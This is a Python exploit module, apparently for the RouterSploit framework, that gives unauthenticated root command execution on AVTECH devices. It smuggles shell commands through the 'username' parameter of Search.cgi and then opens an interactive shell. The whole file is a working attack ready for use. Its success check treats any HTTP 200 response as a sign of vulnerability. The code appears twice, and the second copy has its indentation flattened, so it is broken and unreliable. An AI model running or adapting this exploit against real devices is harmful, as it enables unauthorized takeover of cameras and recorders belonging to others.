paralax/avtech_rce.py

## avtech_rce.py
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient

class Exploit(HTTPClient):
    __info__ = {
        "name": "AVTECH Device Command Execution",
        "description": """This module exploits a vulnerability in AVTECH device httpd server. The cgi_query action in Search.cgi performs HTML requests with the wget system command, which uses the received parameters without sanitization or verification. By exploiting this issue, an attacker can execute any system command with root privileges without authentication.""",
        "authors": (
            "@jnazario",  # routersploit module
            'Gergely Eberhardt' # discovery and PoC
        ),
        "references": (
            "https://www.exploit-db.com/exploits/40500/",
        ),
        "devices": (
            'AVTECH',
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    basepath = '/cgi-bin/nobody/Search.cgi'

    def run(self):
        if self.check():
            print_success("Target appears to be vulnerable")
            shell(self)
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        fmt = """{0}?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password>$({1});&password=admin"""
        self.http_request(method='GET',
                          path=fmt.format(self.basepath, cmd))

    @mute
    def check(self):
        response = self.http_request(method='GET',
                                     path=self.basepath)
        if response is None:
            return False
        if response.status_code == 200:
            return True
        return False
	from routersploit.core.exploit import *
	from routersploit.core.http.http_client import HTTPClient

	class Exploit(HTTPClient):
	__info__ = {
	"name": "AVTECH Device Command Execution",
	"description": """This module exploits a vulnerability in AVTECH device httpd server. The cgi_query action in Search.cgi performs HTML requests with the wget system command, which uses the received parameters without sanitization or verification. By exploiting this issue, an attacker can execute any system command with root privileges without authentication.""",
	"authors": (
	"@jnazario", # routersploit module
	'Gergely Eberhardt' # discovery and PoC
	),
	"references": (
	"https://www.exploit-db.com/exploits/40500/",
	),
	"devices": (
	'AVTECH',
	)
	}

	target = OptIP("", "Target IPv4 or IPv6 address")
	port = OptPort(80, "Target HTTP port")

	basepath = '/cgi-bin/nobody/Search.cgi'

	def run(self):
	if self.check():
	print_success("Target appears to be vulnerable")
	shell(self)
	else:
	print_error("Target is not vulnerable")

	def execute(self, cmd):
	fmt = """{0}?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password>$({1});&password=admin"""
	self.http_request(method='GET',
	path=fmt.format(self.basepath, cmd))

	@mute
	def check(self):
	response = self.http_request(method='GET',
	path=self.basepath)
	if response is None:
	return False
	if response.status_code == 200:
	return True
	return False